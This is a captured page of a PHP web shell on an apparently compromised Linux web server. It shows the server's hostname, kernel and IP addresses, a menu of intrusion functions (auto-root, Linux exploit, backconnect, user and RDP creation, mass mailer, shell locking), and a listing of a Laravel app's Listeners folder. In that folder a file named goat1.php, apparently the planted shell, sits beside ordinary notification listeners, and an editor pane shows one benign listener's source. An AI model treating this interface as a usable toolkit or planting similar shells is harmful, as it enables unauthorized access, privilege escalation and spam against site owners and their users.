Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo21.com /
app /
Listeners /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
SendClientCreatedEmail.php
1.46
KB
-rw-rw-r--
SendContractCreatedEmail.php
1.9
KB
-rw-rw-r--
SendCustomerCreatedEmail.php
816
B
-rw-rw-r--
SendInvoiceCreatedEmail.php
1.86
KB
-rw-rw-r--
SendNotificationTemplateNotifi...
4.31
KB
-rw-rw-r--
SendProjectCreatedEmail.php
1.98
KB
-rw-rw-r--
SendSlackClientCreated.php
1.19
KB
-rw-rw-r--
SendSlackContractCreated.php
1.37
KB
-rw-rw-r--
SendSlackInvoiceCreated.php
1.27
KB
-rw-rw-r--
SendSlackProjectNotification.p...
1.08
KB
-rw-rw-r--
SendSlackTaskNotification.php
1.17
KB
-rw-rw-r--
SendSlackZoomMeetingCreated.ph...
1.34
KB
-rw-rw-r--
SendTaskCreatedEmail.php
1.82
KB
-rw-rw-r--
SendTelegramClientNotification...
1.15
KB
-rw-rw-r--
SendTelegramContractNotificati...
1.35
KB
-rw-rw-r--
SendTelegramInvoiceNotificatio...
1.22
KB
-rw-rw-r--
SendTelegramNotifications.php
2.66
KB
-rw-rw-r--
SendTelegramProjectNotificatio...
1.13
KB
-rw-rw-r--
SendTelegramTaskNotification.p...
1.29
KB
-rw-rw-r--
SendTelegramZoomMeetingNotific...
1.35
KB
-rw-rw-r--
SendUniversalNotification.php
8.42
KB
-rw-rw-r--
SendUserCreatedEmail.php
1.97
KB
-rw-rw-r--
SendVendorCreatedEmail.php
790
B
-rw-rw-r--
SendZoomMeetingCreatedEmail.ph...
2.16
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SendClientCreatedEmail.php
<?php namespace App\Listeners; use App\Events\ClientCreated; use App\Models\User; use App\Services\EmailTemplateService; use Illuminate\Support\Facades\Log; class SendClientCreatedEmail { public function __construct(private EmailTemplateService $emailService) {} public function handle(ClientCreated $event): void { if (isEmailTemplateEnabled('Client Created') && $event->client->email) { try { $client = $event->client; $variables = [ '{client_name}' => $client->name, '{user_name}' => $client->name, '{client_email}' => $client->email, '{client_company}' => $client->company ?? 'N/A', '{company_name}' => config('app.name'), '{app_url}' => config('app.url') ]; $createdByUser = User::find(createdBy()); $userLanguage = $createdByUser->lang ?? 'en'; $this->emailService->sendTemplateEmailWithLanguage( templateName: 'Client Created', variables: $variables, toEmail: $client->email, toName: $client->created_by, language: $userLanguage ); } catch (\Exception $e) { Log::error('Error in SendClientCreatedEmail listener: ' . $e->getMessage()); return; } } } }
Close